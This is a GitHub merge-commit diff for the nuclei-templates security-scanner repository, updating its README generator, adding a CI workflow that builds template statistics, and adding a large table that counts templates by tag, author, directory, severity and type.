Merge pull request #76 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-07-21 10:22:33 +05:30 committed by GitHub
commit f1900edf14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
98 changed files with 1460 additions and 281 deletions

View File

@ -3,7 +3,7 @@ f"""
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,25 +24,21 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} |
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
{get_top10()}
**{command("tree", -2, None)}**.
@ -50,34 +46,34 @@ An overview of the nuclei template directory including number of templates assoc
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
Thanks again for your contribution and keeping the community vibrant. :heart:
Thanks again for your contribution and keeping this community vibrant. :heart:
"""

View File

@ -8,6 +8,11 @@ def countTpl(path):
def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
TOP10 = command(["cat", "TOP-10.md"])
return HEADER + TOP10 if len(TOP10) > 0 else ""
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
template = eval(open(".github/scripts/README.tmpl", "r").read())

70
.github/workflows/templates-stats.yml vendored Normal file
View File

@ -0,0 +1,70 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout Repo
uses: actions/checkout@master
with:
fetch-depth: 0
- name: Setup golang
uses: actions/setup-go@v2
with:
go-version: 1.14
- name: Cache Go
id: cache-go
uses: actions/cache@v2
with:
path: /home/runner/go
key: ${{ runner.os }}-go
- name: Installing Template Stats
if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/templates-stats
shell: bash
- name: Markdown Stats
run: |
templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }}
shell: bash
- name: JSON Stats
run: |
templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }}
shell: bash
- name: Top 10 Stats
run: |
templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }}
shell: bash
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.stats.outputs.changes > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -1,12 +1,10 @@
name: 📝 Readme Update
on:
push:
branches:
- master
create:
tags:
- v*
workflow_dispatch:
jobs:
build:

View File

@ -8,10 +8,9 @@
# unless asked for by the user.
tags:
- "fuzz"
- "dos"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.

View File

@ -3,7 +3,7 @@
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,59 +24,68 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
| takeovers | 70 | exposures | 116 | technologies | 125 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
| default-logins | 44 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
## Nuclei Templates Top 10 statistics
**134 directories, 1596 files**.
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
**134 directories, 1612 files**.
</td>
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
Thanks again for your contribution and keeping the community vibrant. :heart:
Thanks again for your contribution and keeping this community vibrant. :heart:

1
TEMPLATES-STATS.json Normal file

File diff suppressed because one or more lines are too long

601
TEMPLATES-STATS.md Normal file
View File

@ -0,0 +1,601 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------|
| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 |
| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 |
| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 |
| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | |
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
| cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | |
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | |
| config | 81 | ice3man | 26 | miscellaneous | 27 | | | | |
| tech | 72 | pussycat0x | 25 | network | 25 | | | | |
| takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | |
| cve2021 | 71 | organiccrap | 19 | dns | 10 | | | | |
| token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | |
| cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | |
| apache | 60 | techbrunchfr | 13 | headless | 5 | | | | |
| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | |
| cve2017 | 43 | pr3r00t | 12 | | | | | | |
| file | 42 | cyllective | 11 | | | | | | |
| unauth | 39 | random_robbie | 10 | | | | | | |
| iot | 33 | righettod | 9 | | | | | | |
| network | 32 | wdahlenb | 8 | | | | | | |
| sqli | 29 | hackergautam | 8 | | | | | | |
| oracle | 29 | nadino | 8 | | | | | | |
| workflow | 28 | aashiq | 8 | | | | | | |
| misc | 27 | iamthefrogy | 8 | | | | | | |
| atlassian | 26 | harshbothra_ | 7 | | | | | | |
| ssrf | 25 | randomstr1ng | 7 | | | | | | |
| jira | 25 | techryptic (@tech) | 7 | | | | | | |
| disclosure | 24 | oppsec | 7 | | | | | | |
| oob | 24 | r3dg33k | 7 | | | | | | |
| logs | 24 | emadshanab | 7 | | | | | | |
| redirect | 20 | 0x240x23elu | 7 | | | | | | |
| aem | 18 | dr_set | 7 | | | | | | |
| listing | 15 | that_juan_ | 7 | | | | | | |
| cisco | 15 | melbadry9 | 7 | | | | | | |
| sap | 14 | philippedelteil | 6 | | | | | | |
| cve2016 | 14 | __fazal | 6 | | | | | | |
| debug | 13 | yanyun | 5 | | | | | | |
| struts | 13 | panch0r3d | 5 | | | | | | |
| misconfig | 13 | puzzlepeaches | 5 | | | | | | |
| cve2015 | 13 | caspergn | 5 | | | | | | |
| fuzz | 13 | pentest_swissky | 5 | | | | | | |
| weblogic | 12 | ganofins | 5 | | | | | | |
| android | 12 | iamnoooob | 4 | | | | | | |
| dns | 11 | xelkomy | 4 | | | | | | |
| auth-bypass | 11 | e_schultze_ | 4 | | | | | | |
| zoho | 11 | rootxharsh | 4 | | | | | | |
| springboot | 11 | meme-lord | 4 | | | | | | |
| devops | 10 | nodauf | 4 | | | | | | |
| cve2011 | 10 | github.com/its0x08 | 4 | | | | | | |
| jenkins | 9 | shine | 3 | | | | | | |
| cve2012 | 9 | thomas_from_offensity | 3 | | | | | | |
| magento | 9 | tess | 3 | | | | | | |
| dlink | 9 | 0w4ys | 3 | | | | | | |
| aws | 8 | impramodsargar | 3 | | | | | | |
| php | 8 | yash anand @yashanand155 | 3 | | | | | | |
| gitlab | 8 | z3bd | 3 | | | | | | |
| cve2013 | 8 | f1tz | 3 | | | | | | |
| cnvd | 8 | fyoorer | 3 | | | | | | |
| airflow | 8 | binaryfigments | 3 | | | | | | |
| adobe | 8 | kophjager007 | 3 | | | | | | |
| ftp | 8 | joanbono | 3 | | | | | | |
| scada | 7 | 0xprial | 2 | | | | | | |
| joomla | 7 | vavkamil | 2 | | | | | | |
| cve2014 | 7 | swissky | 2 | | | | | | |
| vmware | 7 | joeldeleep | 2 | | | | | | |
| citrix | 6 | elsfa7110 | 2 | | | | | | |
| nginx | 6 | randomrobbie | 2 | | | | | | |
| cms | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | |
| rails | 6 | afaq | 2 | | | | | | |
| backup | 6 | manas_harsh | 2 | | | | | | |
| xxe | 6 | pxmme1337 | 2 | | | | | | |
| api | 6 | shifacyclewala | 2 | | | | | | |
| google | 6 | ehsahil | 2 | | | | | | |
| rconfig | 6 | mavericknerd | 2 | | | | | | |
| iis | 5 | 0xsapra | 2 | | | | | | |
| jetty | 5 | x1m_martijn | 2 | | | | | | |
| phpmyadmin | 5 | random-robbie | 2 | | | | | | |
| login | 5 | bp0lr | 2 | | | | | | |
| circarlife | 5 | moritz nentwig | 2 | | | | | | |
| ssti | 5 | davidmckennirey | 2 | | | | | | |
| lucee | 5 | amsda | 2 | | | | | | |
| dell | 5 | foulenzer | 2 | | | | | | |
| solr | 5 | ree4pwn | 2 | | | | | | |
| laravel | 5 | kiblyn11 | 2 | | | | | | |
| headless | 5 | hetroublemakr | 2 | | | | | | |
| ruijie | 5 | 0xcrypto | 2 | | | | | | |
| confluence | 5 | bsysop | 2 | | | | | | |
| java | 5 | dheerajmadhukar | 2 | | | | | | |
| drupal | 5 | gevakun | 2 | | | | | | |
| router | 4 | udit_thakkur | 2 | | | | | | |
| vpn | 4 | unstabl3 | 2 | | | | | | |
| moodle | 4 | emenalf | 2 | | | | | | |
| hongdian | 4 | incogbyte | 2 | | | | | | |
| magmi | 4 | lu4nx | 2 | | | | | | |
| netgear | 4 | zomsop82 | 2 | | | | | | |
| samsung | 4 | lotusdll | 2 | | | | | | |
| jolokia | 4 | 0xelkomy | 2 | | | | | | |
| docker | 4 | jarijaas | 2 | | | | | | |
| artifactory | 4 | 0xrudra | 2 | | | | | | |
| ibm | 4 | manuelbua | 1 | | | | | | |
| asp | 4 | absshax | 1 | | | | | | |
| thinkcmf | 4 | idealphase | 1 | | | | | | |
| cve2009 | 4 | notsoevilweasel | 1 | | | | | | |
| tomcat | 4 | schniggie | 1 | | | | | | |
| django | 4 | 0ut0fb4nd | 1 | | | | | | |
| nodejs | 4 | raesene | 1 | | | | | | |
| webserver | 4 | @dwisiswant0 | 1 | | | | | | |
| traversal | 4 | th3.d1p4k | 1 | | | | | | |
| solarwinds | 4 | patralos | 1 | | | | | | |
| thinkphp | 4 | ringo | 1 | | | | | | |
| fileupload | 4 | kba@sogeti_esec | 1 | | | | | | |
| elastic | 4 | nytr0gen | 1 | | | | | | |
| kubernetes | 3 | co0nan | 1 | | | | | | |
| backups | 3 | _generic_human_ | 1 | | | | | | |
| deserialization | 3 | aceseven (digisec360) | 1 | | | | | | |
| windows | 3 | whynotke | 1 | | | | | | |
| printer | 3 | rtcms | 1 | | | | | | |
| resin | 3 | 0xrod | 1 | | | | | | |
| crlf | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | |
| caucho | 3 | ratnadip gajbhiye | 1 | | | | | | |
| amazon | 3 | andirrahmani1 | 1 | | | | | | |
| r-seenet | 3 | divya_mudgal | 1 | | | | | | |
| fanruan | 3 | qlkwej | 1 | | | | | | |
| ofbiz | 3 | yavolo | 1 | | | | | | |
| springcloud | 3 | mubassirpatel | 1 | | | | | | |
| kafka | 3 | smaranchand | 1 | | | | | | |
| ssh | 3 | jeya seelan | 1 | | | | | | |
| git | 3 | streetofhackerr007 | 1 | | | | | | |
| vbulletin | 3 | sickwell | 1 | | | | | | |
| oa | 3 | alifathi-h1 | 1 | | | | | | |
| nacos | 3 | knassar702 | 1 | | | | | | |
| microstrategy | 3 | yashgoti | 1 | | | | | | |
| fpd | 3 | mah3sec_ | 1 | | | | | | |
| nosqli | 3 | blckraven | 1 | | | | | | |
| terramaster | 3 | c3l3si4n | 1 | | | | | | |
| grafana | 3 | kurohost | 1 | | | | | | |
| openssh | 3 | dawid czarnecki | 1 | | | | | | |
| slack | 3 | shifacyclewla | 1 | | | | | | |
| ebs | 3 | flag007 | 1 | | | | | | |
| dedecms | 3 | sshell | 1 | | | | | | |
| log | 3 | tim_koopmans | 1 | | | | | | |
| bypass | 3 | akash.c | 1 | | | | | | |
| lfr | 3 | alperenkesk | 1 | | | | | | |
| mongodb | 3 | arcc | 1 | | | | | | |
| sonarqube | 2 | undefl0w | 1 | | | | | | |
| flir | 2 | dudez | 1 | | | | | | |
| webcam | 2 | deena | 1 | | | | | | |
| couchdb | 2 | wabafet | 1 | | | | | | |
| microsoft | 2 | vsh00t | 1 | | | | | | |
| injection | 2 | alex | 1 | | | | | | |
| hjtcloud | 2 | luci | 1 | | | | | | |
| ucmdb | 2 | rodnt | 1 | | | | | | |
| httpd | 2 | luskabol | 1 | | | | | | |
| rstudio | 2 | gal nagli | 1 | | | | | | |
| zhiyuan | 2 | ldionmarcil | 1 | | | | | | |
| odoo | 2 | j3ssie/geraldino2 | 1 | | | | | | |
| telerik | 2 | b4uh0lz | 1 | | | | | | |
| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | |
| jellyfin | 2 | sy3omda | 1 | | | | | | |
| yapi | 2 | kareemse1im | 1 | | | | | | |
| paloalto | 2 | fmunozs | 1 | | | | | | |
| jboss | 2 | elmahdi | 1 | | | | | | |
| kentico | 2 | affix | 1 | | | | | | |
| chamilo | 2 | iampritam | 1 | | | | | | |
| sharepoint | 2 | fopina | 1 | | | | | | |
| vrealize | 2 | remonsec | 1 | | | | | | |
| oauth | 2 | hanlaomo | 1 | | | | | | |
| saltstack | 2 | chron0x | 1 | | | | | | |
| dos | 2 | johnjhacking | 1 | | | | | | |
| hpe | 2 | vzamanillo | 1 | | | | | | |
| cache | 2 | defr0ggy | 1 | | | | | | |
| service | 2 | bolli95 | 1 | | | | | | |
| glassfish | 2 | apt-mirror | 1 | | | | | | |
| leak | 2 | abison_binoy | 1 | | | | | | |
| mida | 2 | pdp | 1 | | | | | | |
| smb | 2 | shreyapohekar | 1 | | | | | | |
| hp | 2 | dogasantos | 1 | | | | | | |
| hashicorp | 2 | _c0wb0y_ | 1 | | | | | | |
| coldfusion | 2 | furkansenan | 1 | | | | | | |
| pega | 2 | koti2 | 1 | | | | | | |
| proxy | 2 | thezakman | 1 | | | | | | |
| nagios | 2 | d0rkerdevil | 1 | | | | | | |
| cve2008 | 2 | naglinagli | 1 | | | | | | |
| kibana | 2 | r3naissance | 1 | | | | | | |
| idrac | 2 | nkxxkn | 1 | | | | | | |
| openfire | 2 | s1r1u5_ | 1 | | | | | | |
| waf | 2 | 52971 | 1 | | | | | | |
| showdoc | 2 | exploitation | 1 | | | | | | |
| shellshock | 2 | akshansh | 1 | | | | | | |
| wordfence | 2 | alph4byt3 | 1 | | | | | | |
| sonicwall | 2 | 0h1in9e | 1 | | | | | | |
| prometheus | 2 | mohammedsaneem | 1 | | | | | | |
| intrusive | 2 | aaron_costello | 1 | | | | | | |
| | | (@conspiracyproof) | | | | | | | |
| nextjs | 2 | zandros0 | 1 | | | | | | |
| smtp | 2 | fabaff | 1 | | | | | | |
| bigip | 2 | _harleo | 1 | | | | | | |
| natshell | 2 | ooooooo_q | 1 | | | | | | |
| spark | 2 | noamrathaus | 1 | | | | | | |
| icewarp | 2 | hakluke | 1 | | | | | | |
| ecology | 2 | willd96 | 1 | | | | | | |
| voipmonitor | 2 | omarkurt | 1 | | | | | | |
| openam | 2 | kishore krishna (sillydaddy) | 1 | | | | | | |
| fortios | 2 | ajaysenr | 1 | | | | | | |
| maian | 2 | yashanand155 | 1 | | | | | | |
| rockethchat | 2 | tirtha_mandal | 1 | | | | | | |
| mail | 2 | sullo | 1 | | | | | | |
| zabbix | 2 | micha3lb3n | 1 | | | | | | |
| rockmongo | 2 | mhdsamx | 1 | | | | | | |
| exposures | 2 | juicypotato1 | 1 | | | | | | |
| plesk | 2 | thevillagehacker | 1 | | | | | | |
| nexus | 2 | bjhulst | 1 | | | | | | |
| keycloak | 2 | ipanda | 1 | | | | | | |
| emerge | 2 | w4cky_ | 1 | | | | | | |
| seeyon | 2 | kabirsuda | 1 | | | | | | |
| activemq | 2 | toufik airane | 1 | | | | | | |
| xxljob | 2 | ahmed sherif | 1 | | | | | | |
| globalprotect | 2 | j33n1k4 | 1 | | | | | | |
| huawei | 2 | gboddin | 1 | | | | | | |
| frp | 2 | ilovebinbash | 1 | | | | | | |
| splunk | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | |
| trixbox | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | |
| | | security | | | | | | | |
| strapi | 2 | soyelmago | 1 | | | | | | |
| azure | 1 | sushant kamble | 1 | | | | | | |
| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | |
| ssl | 1 | its0x08 | 1 | | | | | | |
| xiuno | 1 | becivells | 1 | | | | | | |
| enumeration | 1 | geraldino2 | 1 | | | | | | |
| javamelody | 1 | pudsec | 1 | | | | | | |
| nuuo | 1 | daviey | 1 | | | | | | |
| hadoop | 1 | berkdusunur | 1 | | | | | | |
| lanproxy | 1 | ohlinge | 1 | | | | | | |
| bullwark | 1 | bad5ect0r | 1 | | | | | | |
| itop | 1 | regala_ | 1 | | | | | | |
| nsasg | 1 | g4l1t0 and @convisoappsec | 1 | | | | | | |
| rsyncd | 1 | rojanrijal | 1 | | | | | | |
| primetek | 1 | streetofhackerr007 (rohit | 1 | | | | | | |
| | | soni) | | | | | | | |
| gateone | 1 | bing0o | 1 | | | | | | |
| alerta | 1 | shelld3v | 1 | | | | | | |
| 74cms | 1 | zhenwarx | 1 | | | | | | |
| metinfo | 1 | _darrenmartyn | 1 | | | | | | |
| huijietong | 1 | johnk3r | 1 | | | | | | |
| xff | 1 | taielab | 1 | | | | | | |
| st | 1 | cookiehanhoan | 1 | | | | | | |
| webmin | 1 | 0xtavian | 1 | | | | | | |
| postmessage | 1 | sicksec | 1 | | | | | | |
| parentlink | 1 | | | | | | | | |
| alertmanager | 1 | | | | | | | | |
| darkstat | 1 | | | | | | | | |
| visionhub | 1 | | | | | | | | |
| realteo | 1 | | | | | | | | |
| yii | 1 | | | | | | | | |
| sprintful | 1 | | | | | | | | |
| fortilogger | 1 | | | | | | | | |
| maccmsv10 | 1 | | | | | | | | |
| trilithic | 1 | | | | | | | | |
| feifeicms | 1 | | | | | | | | |
| jnoj | 1 | | | | | | | | |
| netis | 1 | | | | | | | | |
| xunchi | 1 | | | | | | | | |
| interlib | 1 | | | | | | | | |
| gogs | 1 | | | | | | | | |
| opentsdb | 1 | | | | | | | | |
| mailchimp | 1 | | | | | | | | |
| akamai | 1 | | | | | | | | |
| grav | 1 | | | | | | | | |
| portainer | 1 | | | | | | | | |
| cobub | 1 | | | | | | | | |
| svnserve | 1 | | | | | | | | |
| ntopng | 1 | | | | | | | | |
| cve2010 | 1 | | | | | | | | |
| hortonworks | 1 | | | | | | | | |
| mirai | 1 | | | | | | | | |
| redhat | 1 | | | | | | | | |
| ilo4 | 1 | | | | | | | | |
| mongoshake | 1 | | | | | | | | |
| grails | 1 | | | | | | | | |
| erp-nc | 1 | | | | | | | | |
| spf | 1 | | | | | | | | |
| setup | 1 | | | | | | | | |
| aspnuke | 1 | | | | | | | | |
| fiori | 1 | | | | | | | | |
| domxss | 1 | | | | | | | | |
| rmi | 1 | | | | | | | | |
| harbor | 1 | | | | | | | | |
| razor | 1 | | | | | | | | |
| smartsense | 1 | | | | | | | | |
| majordomo2 | 1 | | | | | | | | |
| beanshell | 1 | | | | | | | | |
| zcms | 1 | | | | | | | | |
| enum | 1 | | | | | | | | |
| linksys | 1 | | | | | | | | |
| sco | 1 | | | | | | | | |
| xml | 1 | | | | | | | | |
| floc | 1 | | | | | | | | |
| chinaunicom | 1 | | | | | | | | |
| phalcon | 1 | | | | | | | | |
| soar | 1 | | | | | | | | |
| jenzabar | 1 | | | | | | | | |
| flink | 1 | | | | | | | | |
| exchange | 1 | | | | | | | | |
| concrete | 1 | | | | | | | | |
| empirecms | 1 | | | | | | | | |
| openrestry | 1 | | | | | | | | |
| varnish | 1 | | | | | | | | |
| optiLink | 1 | | | | | | | | |
| opm | 1 | | | | | | | | |
| checkpoint | 1 | | | | | | | | |
| octoprint | 1 | | | | | | | | |
| faraday | 1 | | | | | | | | |
| tika | 1 | | | | | | | | |
| nuxeo | 1 | | | | | | | | |
| uwsgi | 1 | | | | | | | | |
| kerbynet | 1 | | | | | | | | |
| fortiweb | 1 | | | | | | | | |
| nps | 1 | | | | | | | | |
| zmanda | 1 | | | | | | | | |
| node | 1 | | | | | | | | |
| upload | 1 | | | | | | | | |
| discord | 1 | | | | | | | | |
| vscode | 1 | | | | | | | | |
| doh | 1 | | | | | | | | |
| scs | 1 | | | | | | | | |
| octobercms | 1 | | | | | | | | |
| extractor | 1 | | | | | | | | |
| bitly | 1 | | | | | | | | |
| fuelcms | 1 | | | | | | | | |
| webmodule-ee | 1 | | | | | | | | |
| keenetic | 1 | | | | | | | | |
| nette | 1 | | | | | | | | |
| dlogin | 1 | | | | | | | | |
| servicenow | 1 | | | | | | | | |
| cocoon | 1 | | | | | | | | |
| favicon | 1 | | | | | | | | |
| mantisbt | 1 | | | | | | | | |
| ns | 1 | | | | | | | | |
| lansweeper | 1 | | | | | | | | |
| bash | 1 | | | | | | | | |
| ecom | 1 | | | | | | | | |
| oscommerce | 1 | | | | | | | | |
| servicedesk | 1 | | | | | | | | |
| nexusdb | 1 | | | | | | | | |
| webui | 1 | | | | | | | | |
| expn | 1 | | | | | | | | |
| jsp | 1 | | | | | | | | |
| zzzcms | 1 | | | | | | | | |
| openstack | 1 | | | | | | | | |
| openerp | 1 | | | | | | | | |
| javafaces | 1 | | | | | | | | |
| csrf | 1 | | | | | | | | |
| sqlite | 1 | | | | | | | | |
| dotnetnuke | 1 | | | | | | | | |
| opensmtpd | 1 | | | | | | | | |
| stem | 1 | | | | | | | | |
| panos | 1 | | | | | | | | |
| netrc | 1 | | | | | | | | |
| calendarix | 1 | | | | | | | | |
| myucms | 1 | | | | | | | | |
